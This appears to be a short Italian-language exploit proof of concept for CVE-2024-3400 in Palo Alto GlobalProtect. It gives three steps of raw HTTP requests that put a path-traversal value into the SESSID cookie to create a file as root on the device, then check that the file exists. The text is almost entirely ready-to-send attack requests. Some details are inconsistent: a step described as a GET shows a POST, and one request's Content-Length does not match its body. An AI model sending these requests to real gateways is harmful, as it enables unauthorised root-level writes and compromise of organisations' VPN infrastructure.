
Exploit proof-of-concept per CVE-2024-3400, una vulnerabilità di iniezione di comandi in Palo Alto GlobalProtect, che dimostra il caricamento e la verifica di file tramite richieste HTTP appositamente create.
#Passaggi :
#1. Verificare se il file (0xr2r.txt) è presente sul dispositivo eseguendo la seguente richiesta GET oppure possiamo verificarlo aprendo
https://domain.com/global-protect/portal/images/0xr2r.txt URL nel browser se ricevi una risposta 404 significa che il file non è presente.
POST /ssl-vpn/hipreport.esp HTTP/1.1
Host: domain.com
Cookie: SESSID=/../../../var/appweb/sslvpndocs/global-protect/portal/images/0xr2r.txt
Content-Type: application/x-www-form-urlencoded
Content-Length: 0
#2. ora inserisci il file (0xr2r.txt) sul dispositivo eseguendo la seguente richiesta POST. Questo creerà il file sul dispositivo nel percorso indicato con accesso root.
POST /ssl-vpn/hipreport.esp HTTP/1.1
Host: domain.com
Cookie: SESSID=/../../../var/appweb/sslvpndocs/global-protect/portal/images/0xr2r.txt
Content-Type: application/x-www-form-urlencoded
Content-Length: 0
user=0xr2r&portal=0xr2r&authcookie=284ad748-7ce2-4753-a39a-aa381b18cf70&domain=0xr2r&computer=0xr2r&client-ip=0xr2r&client-ipv6=0xr2r&md5-sum=0xr2r&gwHipReportCheck=0xr2r
#3. ora se provi ad accedere nuovamente ai file dovresti ricevere 403 invece di 404. questo dimostra che il file (0xr2r.txt) è presente sul dispositivo con accesso root.
POST /ssl-vpn/hipreport.esp HTTP/1.1
Host: domain.com
Cookie: SESSID=/../../../var/appweb/sslvpndocs/global-protect/portal/images/0xr2r.txt
Content-Type: application/x-www-form-urlencoded
Content-Length: 170
user=0xr2r&portal=0xr2r&authcookie=284ad748-7ce2-4753-a39a-aa381b18cf70&domain=0xr2r&computer=0xr2r&client-ip=0xr2r&client-ipv6=0xr2r&md5-sum=0xr2r&gwHipReportCheck=0xr2r